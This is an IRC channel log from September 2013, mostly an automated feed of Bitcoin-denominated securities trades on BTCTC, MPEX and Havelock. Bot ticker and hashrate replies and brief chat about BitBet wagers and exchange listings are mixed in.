[ACTIVEMINING] 2 @ 0.004006 = 0.008 BTC [-] Sep 01 01:54:55 [BTCTC] [ACTIVEMINING] 87 @ 0.004005 = 0.3484 BTC [-] Sep 01 01:54:56 [BTCTC] [ACTIVEMINING] 1000 @ 0.004002 = 4.002 BTC [-] Sep 01 01:54:58 [BTCTC] [ACTIVEMINING] 75 @ 0.004002 = 0.3002 BTC [-] Sep 01 01:57:45 [BTCTC] [ACTIVEMINING] 5 @ 0.004 = 0.02 BTC [-] Sep 01 01:57:46 [BTCTC] [ACTIVEMINING] 5 @ 0.004 = 0.02 BTC [-] Sep 01 01:57:47 [BTCTC] [ACTIVEMINING] 490 @ 0.004 = 1.96 BTC [-] Sep 01 01:59:56 [BTCTC] [PETA-MINE] 10 @ 0.65 = 6.5 BTC [+] Sep 01 02:02:09 [BTCTC] [LABCOIN] 16 @ 0.003579 = 0.0573 BTC [-] Sep 01 02:03:50 [MPEX] [S.MPOE] 5100 @ 0.00087082 = 4.4412 BTC [-] Sep 01 02:03:51 [MPEX] [S.MPOE] 3100 @ 0.00087026 = 2.6978 BTC [-] Sep 01 02:04:02 [MPEX] [S.MPOE] 4758 @ 0.00086884 = 4.1339 BTC [-] Sep 01 02:08:25 [BTCTC] [LABCOIN] 3 @ 0.003559 = 0.0107 BTC [-] Sep 01 02:10:48 Good good Sep 01 02:13:19 eeeeexcelent Sep 01 02:15:43 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Sep 01 02:16:43 [BTCTC] [DMS.MINING] 38 @ 0.003226 = 0.1226 BTC [-] Sep 01 02:16:44 [BTCTC] [DMS.MINING] 300 @ 0.003225 = 0.9675 BTC [-] Sep 01 02:16:46 [BTCTC] [DMS.MINING] 22 @ 0.00322 = 0.0708 BTC [-] Sep 01 02:16:46 [BTCTC] [DMS.MINING] 3 @ 0.003213 = 0.0096 BTC [-] Sep 01 02:16:47 [BTCTC] [DMS.MINING] 3 @ 0.00321 = 0.0096 BTC [-] Sep 01 02:16:48 [BTCTC] [DMS.MINING] 2 @ 0.003201 = 0.0064 BTC [-] Sep 01 02:16:49 [BTCTC] [DMS.MINING] 100 @ 0.003201 = 0.3201 BTC [-] Sep 01 02:16:50 [BTCTC] [DMS.MINING] 41 @ 0.0032 = 0.1312 BTC [-] Sep 01 02:16:52 [BTCTC] [DMS.MINING] 6 @ 0.0032 = 0.0192 BTC [-] Sep 01 02:16:53 [BTCTC] [DMS.MINING] 1 @ 0.0032 BTC [-] Sep 01 02:16:54 [BTCTC] [DMS.MINING] 1 @ 0.0032 BTC [-] Sep 01 02:19:54 [BTCTC] [PETA-MINE] 20 @ 0.65 = 13 BTC [+] Sep 01 02:26:26 ;;ticker Sep 01 02:26:30 MtGox BTCUSD ticker | Best bid: 140.44190, Best ask: 140.44192, Bid-ask spread: 0.00002, Last trade: 140.44192, 24 hour volume: 29621.29593549, 24 hour low: 135.89000, 24 hour high: 148.70000, 24 hour vwap: 143.02056 Sep 01 02:26:31 ;;nethash Sep 01 02:26:32 693780.353343 Sep 01 02:26:34 ;;estimate Sep 01 02:26:35 Next difficulty estimate | 83153841.6921 based on data since last change | 96918516.8521 based on data for last three days Sep 01 02:27:03 ;;ticker --bitstamp Sep 01 02:27:04 (ticker [--bid|--ask|--last|--high|--low|--avg|--vol] [--currency XXX] [--market |all]) -- Return pretty-printed ticker. Default market is Mtgox. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure the code (1 more message) Sep 01 02:27:12 ;;ticker --market bitstamp Sep 01 02:27:13 Bitstamp BTCUSD ticker | Best bid: 127.03, Best ask: 128.90, Bid-ask spread: 1.87000, Last trade: 127.03, 24 hour volume: 19393.68175885, 24 hour low: 124.65, 24 hour high: 134.95, 24 hour vwap: None Sep 01 02:27:55 Not bad Sep 01 02:29:12 [BTCTC] [BASIC-MINING] 1 @ 0.181 BTC [-] Sep 01 02:30:11 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC [+] Sep 01 02:41:58 [BTCTC] [ASICMINER-PT] 7 @ 2.44 = 17.08 BTC [-] Sep 01 02:42:45 [BTCTC] [ASICMINER-PT] 1 @ 2.438 BTC [-] Sep 01 02:42:46 [BTCTC] [ASICMINER-PT] 4 @ 2.438 = 9.752 BTC [-] Sep 01 02:46:46 [BTCTC] [ASICMINER-PT] 1 @ 2.437 BTC [-] Sep 01 02:46:46 [BTCTC] [ASICMINER-PT] 20 @ 2.436 = 48.72 BTC [-] Sep 01 02:55:06 [BTCTC] [PETA-MINE] 10 @ 0.65 = 6.5 BTC [+] Sep 01 02:55:28 [BTCTC] [ACTIVEMINING] 15 @ 0.00402 = 0.0603 BTC [+] Sep 01 02:55:30 [BTCTC] [ACTIVEMINING] 5 @ 0.00402 = 0.0201 BTC [+] Sep 01 02:55:31 [BTCTC] [ACTIVEMINING] 500 @ 0.00401 = 2.005 BTC [-] Sep 01 02:55:32 [BTCTC] [ACTIVEMINING] 200 @ 0.004008 = 0.8016 BTC [-] Sep 01 02:55:33 [BTCTC] [ACTIVEMINING] 320 @ 0.004 = 1.28 BTC [-] Sep 01 02:55:35 [BTCTC] [ACTIVEMINING] 5 @ 0.004 = 0.02 BTC [-] Sep 01 02:55:36 [BTCTC] [ACTIVEMINING] 1630 @ 0.004 = 6.52 BTC [-] Sep 01 02:55:37 [BTCTC] [DMS.PURCHASE] 11 @ 0.01588 = 0.1747 BTC [-] Sep 01 02:56:23 [HAVELOCK] [AM100] 9 @ 0.0240002 = 0.216 BTC [+] Sep 01 02:56:42 [HAVELOCK] [AM100] 12 @ 0.02400001 = 0.288 BTC [-] Sep 01 02:57:31 [HAVELOCK] [AM100] 18 @ 0.024 = 0.432 BTC [-] Sep 01 02:58:08 [HAVELOCK] [AM100] 20 @ 0.024 = 0.48 BTC [-] Sep 01 03:00:19 mircea_popescu: yes/no ? Sep 01 03:00:33 hm ? Sep 01 03:00:45 bitfury bet resolution time Sep 01 03:00:47 is ended. Sep 01 03:01:10 dude, get some sleep. it's not going anywhere. Sep 01 03:01:18 :( Sep 01 03:04:59 [BTCTC] [PETA-MINE] 2 @ 0.65 = 1.3 BTC [+] Sep 01 03:05:00 [BTCTC] [ACTIVEMINING] 4 @ 0.004 = 0.016 BTC [-] Sep 01 03:05:57 [BTCTC] [ACTIVEMINING] 25 @ 0.004 = 0.1 BTC [-] Sep 01 03:06:30 that bet should probably be nullified. imo. (though i would lean toward the no side) Sep 01 03:07:02 [HAVELOCK] [HIM] 1 @ 0.1705 BTC [-] Sep 01 03:07:39 [MPEX] [S.MPOE] 4658 @ 0.00086984 = 4.0517 BTC [+] Sep 01 03:07:40 [MPEX] [S.MPOE] 4042 @ 0.00087099 = 3.5205 BTC [+] Sep 01 03:07:48 qqq111 who're you ? Sep 01 03:07:54 [HAVELOCK] [HIM] 6 @ 0.17 = 1.02 BTC [-] Sep 01 03:08:44 well, i am qqq111. Sep 01 03:08:53 ic. Sep 01 03:10:32 a joke Sep 01 03:12:25 [BTCTC] [ACTIVEMINING] 2981 @ 0.004 = 11.924 BTC [-] Sep 01 03:14:14 [BTCTC] [DMS.MINING] 49 @ 0.003162 = 0.1549 BTC [-] Sep 01 03:15:12 [BTCTC] [LABCOIN] 11 @ 0.00367 = 0.0404 BTC [+] Sep 01 03:15:14 [BTCTC] [LABCOIN] 20 @ 0.003671 = 0.0734 BTC [+] Sep 01 03:15:14 looking at it from a PR viewpoint for bitbet, it would probably be best to nullify... avoid the inevitable forum shitstorm. (unless thats what the owners want ;) Sep 01 03:15:14 [BTCTC] [LABCOIN] 80 @ 0.003681 = 0.2945 BTC [+] Sep 01 03:15:15 [BTCTC] [LABCOIN] 541 @ 0.003721 = 2.0131 BTC [+] Sep 01 03:15:17 [BTCTC] [ACTIVEMINING] 360 @ 0.004 = 1.44 BTC [-] Sep 01 03:15:18 [BTCTC] [ACTIVEMINING] 1640 @ 0.004 = 6.56 BTC [-] Sep 01 03:15:45 [BTCTC] [DMS.MINING] 35 @ 0.0033 = 0.1155 BTC [+] Sep 01 03:16:33 [BTCTC] [ACTIVEMINING] 532 @ 0.004 = 2.128 BTC [-] Sep 01 03:17:25 [BTCTC] [LABCOIN] 465 @ 0.003717 = 1.7284 BTC [-] Sep 01 03:17:26 [BTCTC] [LABCOIN] 709 @ 0.003719 = 2.6368 BTC [+] Sep 01 03:17:44 qqq111 you're a pr expert then ? Sep 01 03:19:16 i wish. i'd probably have more money then i do now.. Sep 01 03:19:27 [BTCTC] [LABCOIN] 20 @ 0.003719 = 0.0744 BTC [+] Sep 01 03:19:28 [BTCTC] [LABCOIN] 380 @ 0.00372 = 1.4136 BTC [+] Sep 01 03:20:18 I'm surprised there isn't a 'US will strike syria by X date' bet Sep 01 03:22:16 this one is close i guess http://bitbet.us/bet/515/the-us-will-be-specifically-involved-in-another/ Sep 01 03:22:35 [BTCTC] [LABCOIN] 20 @ 0.00372 = 0.0744 BTC [+] Sep 01 03:22:48 [BTCTC] [LABCOIN] 347 @ 0.00372 = 1.2908 BTC [+] Sep 01 03:22:55 [BTCTC] [LABCOIN] 200 @ 0.00372 = 0.744 BTC [+] Sep 01 03:22:56 [BTCTC] [LABCOIN] 347 @ 0.00372 = 1.2908 BTC [+] Sep 01 03:23:06 [BTCTC] [LABCOIN] 46 @ 0.00372 = 0.1711 BTC [+] Sep 01 03:24:02 [BTCTC] [BFMINES] 29 @ 0.0025 = 0.0725 BTC [+] Sep 01 03:24:51 [BTCTC] [LABCOIN] 13 @ 0.00372 = 0.0484 BTC [+] Sep 01 03:25:25 [BTCTC] [KENILWORTH] 2 @ 0.001799 = 0.0036 BTC [+] Sep 01 03:25:47 [BTCTC] [DMS.MINING] 65 @ 0.0033 = 0.2145 BTC [+] Sep 01 03:26:59 [MPEX] [S.MPOE] 4050 @ 0.00087099 = 3.5275 BTC [+] Sep 01 03:28:23 [BTCTC] [TAT.ASICMINER] 72 @ 0.024 = 1.728 BTC [+] Sep 01 03:32:14 [BTCTC] [LABCOIN] 60 @ 0.00372 = 0.2232 BTC [+] Sep 01 03:38:44 [BTCTC] [DMS.MINING] 100 @ 0.0032 = 0.32 BTC [-] Sep 01 03:41:25 [MPEX] [S.MPOE] 11000 @ 0.00087099 = 9.5809 BTC [+] Sep 01 03:42:30 [BTCTC] [LABCOIN] 38 @ 0.00372 = 0.1414 BTC [+] Sep 01 03:43:01 [MPEX] [S.MPOE] 7550 @ 0.00087099 = 6.576 BTC [+] Sep 01 04:01:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [+] Sep 01 04:03:09 [BTCTC] [DMS.SELLING] 35 @ 0.0128 = 0.448 BTC [-] Sep 01 04:03:10 [BTCTC] [DMS.SELLING] 60 @ 0.0128 = 0.768 BTC [-] Sep 01 04:03:12 [BTCTC] [DMS.SELLING] 124 @ 0.01283 = 1.5909 BTC [+] Sep 01 04:03:13 [BTCTC] [DMS.SELLING] 161 @ 0.01284 = 2.0672 BTC [+] Sep 01 04:05:44 hm, the bet says the *US Congress* will authorize it Sep 01 04:07:32 [BTCTC] [LABCOIN] 233 @ 0.00372 = 0.8668 BTC [+] Sep 01 04:07:33 [BTCTC] [LABCOIN] 27 @ 0.00372 = 0.1004 BTC [+] Sep 01 04:08:08 [BTCTC] [LABCOIN] 12 @ 0.003718 = 0.0446 BTC [-] Sep 01 04:13:28 [HAVELOCK] [AM1] 5 @ 2.5 = 12.5 BTC [+] Sep 01 04:14:06 [BTCTC] [LABCOIN] 2 @ 0.003718 = 0.0074 BTC [-] Sep 01 04:20:08 [HAVELOCK] [XBOND] 2 @ 0.001185 = 0.0024 BTC [-] Sep 01 04:21:27 [MPEX] [S.MPOE] 4100 @ 0.00087011 = 3.5675 BTC [-] Sep 01 04:38:37 [BTCTC] [ACTIVEMINING] 850 @ 0.004001 = 3.4009 BTC [+] Sep 01 04:38:39 [BTCTC] [ACTIVEMINING] 328 @ 0.004 = 1.312 BTC [-] Sep 01 04:38:40 [BTCTC] [ACTIVEMINING] 1 @ 0.004 BTC [-] Sep 01 04:43:24 [BTCTC] [CB.IDIFF-E] 10 @ 0.022 = 0.22 BTC [-] Sep 01 04:47:30 [BTCTC] [ACTIVEMINING] 300 @ 0.003999 = 1.1997 BTC [-] Sep 01 04:50:14 [BTCTC] [KENILWORTH] 10 @ 0.001651 = 0.0165 BTC [-] Sep 01 04:50:14 [BTCTC] [KENILWORTH] 7 @ 0.00165 = 0.0116 BTC [-] Sep 01 04:50:16 [BTCTC] [KENILWORTH] 983 @ 0.001603 = 1.5757 BTC [-] Sep 01 04:51:32 [BTCTC] [LABCOIN] 184 @ 0.003718 = 0.6841 BTC [-] Sep 01 04:52:05 [BTCTC] [LABCOIN] 155 @ 0.003718 = 0.5763 BTC [-] Sep 01 04:52:06 [BTCTC] [LABCOIN] 85 @ 0.00372 = 0.3162 BTC [+] Sep 01 04:58:48 [MPEX] [S.MPOE] 7900 @ 0.00087011 = 6.8739 BTC [-] Sep 01 04:58:49 [MPEX] [S.MPOE] 2900 @ 0.00087099 = 2.5259 BTC [+] Sep 01 04:58:55 [BTCTC] [LABCOIN] 30 @ 0.00372 = 0.1116 BTC [+] Sep 01 04:59:52 [BTCTC] [LABCOIN] 34 @ 0.00372 = 0.1265 BTC [+] Sep 01 05:01:00 [HAVELOCK] [AM100] 1 @ 0.0245 BTC [+] Sep 01 05:03:32 [BTCTC] [ACTIVEMINING] 1000 @ 0.00396 = 3.96 BTC [-] Sep 01 05:03:33 [BTCTC] [ACTIVEMINING] 300 @ 0.00395 = 1.185 BTC [-] Sep 01 05:03:35 [BTCTC] [ACTIVEMINING] 55 @ 0.0039 = 0.2145 BTC [-] Sep 01 05:03:35 [BTCTC] [ACTIVEMINING] 363 @ 0.003896 = 1.4142 BTC [-] Sep 01 05:05:30 [BTCTC] [DMS.MINING] 3 @ 0.0032 = 0.0096 BTC [-] Sep 01 05:13:36 [BTCTC] [DMS.MINING] 1 @ 0.0032 BTC [-] Sep 01 05:16:12 Howdee Sep 01 05:16:35 [BTCTC] [DMS.MINING] 21 @ 0.0032 = 0.0672 BTC [-] Sep 01 05:23:17 [BTCTC] [PETA-MINE] 1 @ 0.65 BTC [+] Sep 01 05:24:35 [BTCTC] [LABCOIN] 85 @ 0.003617 = 0.3074 BTC [-] Sep 01 05:24:37 [BTCTC] [LABCOIN] 20 @ 0.003616 = 0.0723 BTC [-] Sep 01 05:24:38 [BTCTC] [LABCOIN] 546 @ 0.003571 = 1.9498 BTC [-] Sep 01 05:24:39 [BTCTC] [LABCOIN] 136 @ 0.003569 = 0.4854 BTC [-] Sep 01 05:24:40 [BTCTC] [LABCOIN] 125 @ 0.003563 = 0.4454 BTC [-] Sep 01 05:24:42 [BTCTC] [LABCOIN] 500 @ 0.003562 = 1.781 BTC [-] Sep 01 05:24:43 [BTCTC] [LABCOIN] 1210 @ 0.003556 = 4.3028 BTC [-] Sep 01 05:24:44 [BTCTC] [LABCOIN] 2600 @ 0.003555 = 9.243 BTC [-] Sep 01 05:24:44 [BTCTC] [LABCOIN] 109 @ 0.003555 = 0.3875 BTC [-] Sep 01 05:24:45 [BTCTC] [LABCOIN] 2133 @ 0.003553 = 7.5785 BTC [-] Sep 01 05:24:46 [BTCTC] [LABCOIN] 941 @ 0.003551 = 3.3415 BTC [-] Sep 01 05:24:47 [BTCTC] [LABCOIN] 3765 @ 0.00355 = 13.3658 BTC [-] Sep 01 05:24:48 [BTCTC] [LABCOIN] 24 @ 0.003545 = 0.0851 BTC [-] Sep 01 05:24:49 [BTCTC] [LABCOIN] 98 @ 0.003544 = 0.3473 BTC [-] Sep 01 05:24:51 [BTCTC] [LABCOIN] 575 @ 0.00354 = 2.0355 BTC [-] Sep 01 05:24:52 [BTCTC] [LABCOIN] 2300 @ 0.003539 = 8.1397 BTC [-] Sep 01 05:24:53 [BTCTC] [LABCOIN] 24 @ 0.003517 = 0.0844 BTC [-] Sep 01 05:24:54 [BTCTC] [LABCOIN] 97 @ 0.003516 = 0.3411 BTC [-] Sep 01 05:24:55 [BTCTC] [LABCOIN] 50 @ 0.003513 = 0.1757 BTC [-] Sep 01 05:24:56 [BTCTC] [LABCOIN] 100 @ 0.003512 = 0.3512 BTC [-] Sep 01 05:24:57 [BTCTC] [LABCOIN] 100 @ 0.003511 = 0.3511 BTC [-] Sep 01 05:24:57 [BTCTC] [LABCOIN] 1 @ 0.00351 BTC [-] Sep 01 05:24:58 [BTCTC] [LABCOIN] 37 @ 0.003506 = 0.1297 BTC [-] Sep 01 05:24:59 [BTCTC] [LABCOIN] 1 @ 0.003505 BTC [-] Sep 01 05:25:00 [BTCTC] [LABCOIN] 150 @ 0.003505 = 0.5258 BTC [-] Sep 01 05:25:01 [BTCTC] [LABCOIN] 702 @ 0.003501 = 2.4577 BTC [-] Sep 01 05:26:45 [HAVELOCK] [XBOND] 35 @ 0.001145 = 0.0401 BTC [-] Sep 01 05:26:48 [HAVELOCK] [XBOND] 1 @ 0.00114 BTC [-] Sep 01 05:26:52 [HAVELOCK] [XBOND] 1 @ 0.001131 BTC [-] Sep 01 05:26:56 [HAVELOCK] [XBOND] 8 @ 0.001131 = 0.009 BTC [-] Sep 01 05:26:58 [HAVELOCK] [XBOND] 4 @ 0.00113 = 0.0045 BTC [-] Sep 01 05:27:02 [HAVELOCK] [XBOND] 227 @ 0.00110001 = 0.2497 BTC [-] Sep 01 05:27:05 [HAVELOCK] [XBOND] 39 @ 0.0011 = 0.0429 BTC [-] Sep 01 05:27:09 [HAVELOCK] [XBOND] 10 @ 0.0011 = 0.011 BTC [-] Sep 01 05:27:13 [HAVELOCK] [XBOND] 5 @ 0.0010999 = 0.0055 BTC [-] Sep 01 05:27:16 [HAVELOCK] [XBOND] 10 @ 0.00109 = 0.0109 BTC [-] Sep 01 05:27:20 [HAVELOCK] [XBOND] 10 @ 0.0010801 = 0.0108 BTC [-] Sep 01 05:27:24 [HAVELOCK] [XBOND] 10 @ 0.00108 = 0.0108 BTC [-] Sep 01 05:27:27 [HAVELOCK] [XBOND] 10 @ 0.0010777 = 0.0108 BTC [-] Sep 01 05:27:31 [HAVELOCK] [XBOND] 10 @ 0.001076 = 0.0108 BTC [-] Sep 01 05:27:33 [HAVELOCK] [XBOND] 800 @ 0.00107501 = 0.86 BTC [-] Sep 01 05:27:37 [HAVELOCK] [XBOND] 10 @ 0.00107501 = 0.0108 BTC [-] Sep 01 05:27:41 [HAVELOCK] [XBOND] 10 @ 0.00107 = 0.0107 BTC [-] Sep 01 05:27:44 [HAVELOCK] [XBOND] 717 @ 0.001066 = 0.7643 BTC [-] Sep 01 05:27:48 [HAVELOCK] [XBOND] 2 @ 0.00106 = 0.0021 BTC [-] Sep 01 05:27:52 [HAVELOCK] [XBOND] 10 @ 0.00106 = 0.0106 BTC [-] Sep 01 05:27:55 [HAVELOCK] [XBOND] 176 @ 0.00105506 = 0.1857 BTC [-] Sep 01 05:27:59 [HAVELOCK] [XBOND] 6000 @ 0.00105505 = 6.3303 BTC [-] Sep 01 05:28:03 [HAVELOCK] [XBOND] 111 @ 0.00105504 = 0.1171 BTC [-] Sep 01 05:28:06 [HAVELOCK] [XBOND] 250 @ 0.00105501 = 0.2638 BTC [-] Sep 01 05:28:10 [HAVELOCK] [XBOND] 5400 @ 0.001055 = 5.697 BTC [-] Sep 01 05:28:12 [HAVELOCK] [XBOND] 50 @ 0.00105 = 0.0525 BTC [-] Sep 01 05:28:16 [HAVELOCK] [XBOND] 1000 @ 0.00105 = 1.05 BTC [-] Sep 01 05:28:20 [HAVELOCK] [XBOND] 10 @ 0.00105 = 0.0105 BTC [-] Sep 01 05:28:23 [HAVELOCK] [XBOND] 20 @ 0.00105 = 0.021 BTC [-] Sep 01 05:28:27 [HAVELOCK] [XBOND] 2 @ 0.001044 = 0.0021 BTC [-] Sep 01 05:28:31 [HAVELOCK] [XBOND] 90 @ 0.001044 = 0.094 BTC [-] Sep 01 05:28:34 [HAVELOCK] [XBOND] 250 @ 0.001041 = 0.2603 BTC [-] Sep 01 05:28:38 [HAVELOCK] [XBOND] 10 @ 0.00104 = 0.0104 BTC [-] Sep 01 05:28:41 [HAVELOCK] [XBOND] 1000 @ 0.00103911 = 1.0391 BTC [-] Sep 01 05:28:45 [HAVELOCK] [XBOND] 400 @ 0.0010391 = 0.4156 BTC [-] Sep 01 05:28:48 [HAVELOCK] [XBOND] 10 @ 0.00103701 = 0.0104 BTC [-] Sep 01 05:28:51 [HAVELOCK] [XBOND] 5000 @ 0.001037 = 5.185 BTC [-] Sep 01 05:28:55 [HAVELOCK] [XBOND] 150 @ 0.00103671 = 0.1555 BTC [-] Sep 01 05:28:59 [HAVELOCK] [XBOND] 3142 @ 0.001035 = 3.252 BTC [-] Sep 01 05:30:17 [BTCTC] [PETA-MINE] 34 @ 0.65 = 22.1 BTC [+] Sep 01 05:32:44 ;;nethash Sep 01 05:32:45 703837.39756 Sep 01 05:32:49 wow Sep 01 05:32:53 [BTCTC] [LABCOIN] 461 @ 0.003524 = 1.6246 BTC [+] Sep 01 05:32:55 [BTCTC] [LABCOIN] 115 @ 0.003522 = 0.405 BTC [-] Sep 01 05:32:56 [BTCTC] [LABCOIN] 250 @ 0.003517 = 0.8793 BTC [-] Sep 01 05:32:57 [BTCTC] [LABCOIN] 1000 @ 0.003516 = 3.516 BTC [-] Sep 01 05:32:58 [BTCTC] [LABCOIN] 2762 @ 0.003501 = 9.6698 BTC [-] Sep 01 05:32:59 [BTCTC] [LABCOIN] 6510 @ 0.0035 = 22.785 BTC [-] Sep 01 05:33:16 [HAVELOCK] [SDSTM] 1 @ 0.00376 BTC [+] Sep 01 05:33:38 [BTCTC] [BITVPS] 20 @ 0.00261 = 0.0522 BTC [+] Sep 01 05:35:24 [BTCTC] [ASICMINER-PT] 1 @ 2.433 BTC [-] Sep 01 05:35:26 [BTCTC] [ASICMINER-PT] 2 @ 2.433 = 4.866 BTC [-] Sep 01 05:35:27 [BTCTC] [ASICMINER-PT] 1 @ 2.432 BTC [-] Sep 01 05:35:28 [BTCTC] [ASICMINER-PT] 2 @ 2.432 = 4.864 BTC [-] Sep 01 05:35:42 Anyone know what fund approval length is for BTCT? Sep 01 05:35:52 IE how long to get approved? Sep 01 05:37:18 [MPEX] [S.MPOE] 3842 @ 0.00086884 = 3.3381 BTC [-] Sep 01 05:37:19 [MPEX] [S.MPOE] 9858 @ 0.00086767 = 8.5535 BTC [-] Sep 01 05:41:29 [HAVELOCK] [SMG] 100 @ 0.0002335 = 0.0234 BTC [+] Sep 01 05:42:51 [HAVELOCK] [VTX] 2 @ 0.56600001 = 1.132 BTC [+] Sep 01 05:43:38 [HAVELOCK] [VTX] 3 @ 0.566 = 1.698 BTC [-] Sep 01 05:44:11 [BTCTC] [LABCOIN] 409 @ 0.003528 = 1.443 BTC [+] Sep 01 05:44:14 [BTCTC] [LABCOIN] 100 @ 0.003526 = 0.3526 BTC [-] Sep 01 05:44:14 [BTCTC] [LABCOIN] 450 @ 0.003515 = 1.5818 BTC [-] Sep 01 05:44:15 [BTCTC] [LABCOIN] 1000 @ 0.003502 = 3.502 BTC [-] Sep 01 05:44:17 [BTCTC] [LABCOIN] 1840 @ 0.0035 = 6.44 BTC [-] Sep 01 05:44:18 [BTCTC] [LABCOIN] 1000 @ 0.0035 = 3.5 BTC [-] Sep 01 05:44:19 [BTCTC] [LABCOIN] 300 @ 0.0035 = 1.05 BTC [-] Sep 01 05:44:20 [BTCTC] [LABCOIN] 1400 @ 0.0035 = 4.9 BTC [-] Sep 01 05:44:27 [HAVELOCK] [SMG] 397 @ 0.0002104 = 0.0835 BTC [-] Sep 01 05:44:31 [HAVELOCK] [SMG] 115 @ 0.0002103 = 0.0242 BTC [-] Sep 01 05:44:35 [HAVELOCK] [SMG] 398 @ 0.00021002 = 0.0836 BTC [-] Sep 01 05:44:38 [HAVELOCK] [SMG] 90 @ 0.00021001 = 0.0189 BTC [-] Sep 01 05:44:40 [BTCTC] [ASICMINER-PT] 1 @ 2.431 BTC [-] Sep 01 05:44:41 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] Sep 01 05:44:42 [BTCTC] [ASICMINER-PT] 2 @ 2.425 = 4.85 BTC [-] Sep 01 05:44:43 [BTCTC] [ASICMINER-PT] 3 @ 2.423 = 7.269 BTC [-] Sep 01 05:44:45 [BTCTC] [ASICMINER-PT] 17 @ 2.423 = 41.191 BTC [-] Sep 01 05:45:19 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.0008597 = 0.0172 BTC [-] Sep 01 05:48:09 [BTCTC] [LABCOIN] 341 @ 0.003578 = 1.2201 BTC [+] Sep 01 05:48:10 [BTCTC] [LABCOIN] 500 @ 0.003579 = 1.7895 BTC [+] Sep 01 05:48:11 [BTCTC] [LABCOIN] 500 @ 0.00358 = 1.79 BTC [+] Sep 01 05:48:13 [BTCTC] [LABCOIN] 341 @ 0.003583 = 1.2218 BTC [+] Sep 01 05:48:14 [BTCTC] [LABCOIN] 99 @ 0.003651 = 0.3614 BTC [+] Sep 01 05:48:14 [BTCTC] [LABCOIN] 99 @ 0.003652 = 0.3615 BTC [+] Sep 01 05:48:15 [BTCTC] [LABCOIN] 85 @ 0.003667 = 0.3117 BTC [+] Sep 01 05:48:16 [BTCTC] [LABCOIN] 85 @ 0.003668 = 0.3118 BTC [+] Sep 01 05:48:17 [BTCTC] [LABCOIN] 1324 @ 0.003679 = 4.871 BTC [+] Sep 01 05:48:18 [BTCTC] [LABCOIN] 1225 @ 0.00368 = 4.508 BTC [+] Sep 01 05:48:19 [BTCTC] [LABCOIN] 99 @ 0.00368 = 0.3643 BTC [+] Sep 01 05:48:20 [BTCTC] [LABCOIN] 1876 @ 0.003689 = 6.9206 BTC [+] Sep 01 05:48:21 [BTCTC] [LABCOIN] 1876 @ 0.00369 = 6.9224 BTC [+] Sep 01 05:48:22 [BTCTC] [LABCOIN] 2726 @ 0.003697 = 10.078 BTC [+] Sep 01 05:48:23 [BTCTC] [LABCOIN] 100 @ 0.003698 = 0.3698 BTC [+] Sep 01 05:48:24 [BTCTC] [LABCOIN] 2348 @ 0.0037 = 8.6876 BTC [+] Sep 01 05:48:24 [BTCTC] [LABCOIN] 96 @ 0.003708 = 0.356 BTC [+] Sep 01 05:48:26 [BTCTC] [LABCOIN] 990 @ 0.003715 = 3.6779 BTC [+] Sep 01 05:48:27 [BTCTC] [LABCOIN] 1540 @ 0.00372 = 5.7288 BTC [+] Sep 01 05:48:40 such a bad pump Sep 01 05:53:05 [BTCTC] [BFMINES] 5 @ 0.0032 = 0.016 BTC [+] Sep 01 06:00:45 [BTCTC] [LABCOIN] 7 @ 0.003688 = 0.0258 BTC [-] Sep 01 06:02:34 [BTCTC] [ASICMINER-PT] 3 @ 2.423 = 7.269 BTC [-] Sep 01 06:04:21 [HAVELOCK] [XBOND] 40 @ 0.00117999 = 0.0472 BTC [+] Sep 01 06:06:45 [HAVELOCK] [SDSTM] 10 @ 0.00375 = 0.0375 BTC [-] Sep 01 06:06:48 [HAVELOCK] [SDSTM] 61 @ 0.00350001 = 0.2135 BTC [-] Sep 01 06:06:52 [HAVELOCK] [SDSTM] 71 @ 0.00350001 = 0.2485 BTC [-] Sep 01 06:06:55 [HAVELOCK] [SDSTM] 58 @ 0.00350001 = 0.203 BTC [-] Sep 01 06:07:14 [HAVELOCK] [AM100] 1 @ 0.0245 BTC [+] Sep 01 06:07:38 [HAVELOCK] [AM100] 2 @ 0.0245 = 0.049 BTC [+] Sep 01 06:07:43 [BTCTC] [LABCOIN] 35 @ 0.003688 = 0.1291 BTC [-] Sep 01 06:11:00 [BTCTC] [ACTIVEMINING] 90 @ 0.00399 = 0.3591 BTC [+] Sep 01 06:11:58 [HAVELOCK] [AM100] 4 @ 0.0245 = 0.098 BTC [+] Sep 01 06:12:46 [HAVELOCK] [XBOND] 1 @ 0.00117999 BTC [+] **** BEGIN LOGGING AT Sun Sep 1 16:01:35 2013 Sep 01 16:01:51 kakobrekla ahh sweet. Sep 01 16:01:59 so bitbet now has qr codes for the addresses. Sep 01 16:05:11 [BTCTC] [KENILWORTH] 100 @ 0.001797 = 0.1797 BTC [+] Sep 01 16:06:21 [MPEX] [S.MPOE] 6839 @ 0.00087096 = 5.9565 BTC [+] Sep 01 16:12:16 [BTCTC] [B.YABMC] 1 @ 0.001793 BTC [+] Sep 01 16:12:34 [BTCTC] [ACTIVEMINING] 404 @ 0.003813 = 1.5405 BTC [+] Sep 01 16:12:37 [HAVELOCK] [AM100] 4 @ 0.02475 = 0.099 BTC [+] Sep 01 16:13:56 [BTCTC] [BITVPS] 1 @ 0.002311 BTC [-] Sep 01 16:19:33 [BTCTC] [LABCOIN] 100 @ 0.003615 = 0.3615 BTC [-] Sep 01 16:19:36 [HAVELOCK] [LABCO] 1 @ 0.003 BTC [-] Sep 01 16:22:08 [MPEX] [S.MPOE] 4061 @ 0.00087109 = 3.5375 BTC [+] Sep 01 16:22:43 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Sep 01 16:23:09 [BTCTC] [KENILWORTH] 1 @ 0.001797 BTC [+] Sep 01 16:25:42 [HAVELOCK] [XBOND] 1 @ 0.00116 BTC [-] Sep 01 16:26:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.0237 = 0.0948 BTC [+] Sep 01 16:27:31 [BTCTC] [LABCOIN] 1000 @ 0.003699 = 3.699 BTC [+] Sep 01 16:28:30 [BTCTC] [LABCOIN] 1000 @ 0.003699 = 3.699 BTC [+] Sep 01 16:29:45 [BTCTC] [LABCOIN] 518 @ 0.003699 = 1.9161 BTC [+] Sep 01 16:30:28 [BTCTC] 